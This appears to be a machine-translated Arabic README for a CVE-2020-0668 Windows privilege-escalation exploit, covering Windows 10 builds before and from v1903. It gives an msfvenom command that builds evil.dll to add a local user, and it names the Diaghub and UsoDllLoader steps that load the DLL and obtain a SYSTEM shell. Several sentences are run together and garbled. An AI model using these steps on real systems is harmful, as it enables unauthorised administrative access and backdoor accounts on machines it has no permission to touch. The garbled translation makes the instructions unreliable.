
جعل استغلال CVE-2020-0668 يعمل للإصدار < win10 v1903 والإصدار >= win10 v1903
جعل استغلال CVE-2020-0668 يعمل للإصدار < win10 v1903 والإصدار >= win10 v1903
يعمل استغلال powershell على الإصدار < win10 v1903 باستخدام Diaghub.
evil.dll باستخدام msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 باستخدام powershellDiaghub.exe C:\ProgramData evil.dll لتحميل dll وإضافة المستخدم.
يعمل استغلال powershell على الإصدار >= win10 v1903 باستخدام UsoDllLoader.
exp.ps1 باستخدام powershellUsoDllLoader.exe للحصول على شل النظام
إصدار x86 من SysTracingPoc لـ issue، يعمل الاستغلال على الإصدار >= win10 v1903 بسبب UsoLoadDll.
برهان مفهوم .NET. إذا ألقيت نظرة على C:\Windows\System32\evil.dll وأعدت تسميته إلى evil.txt،
ستجده ليس ملف dll. فقط سجل تتبع فيه.
برهان مفهوم powershell. أيضًا فقط سجل تتبع في evil.dll.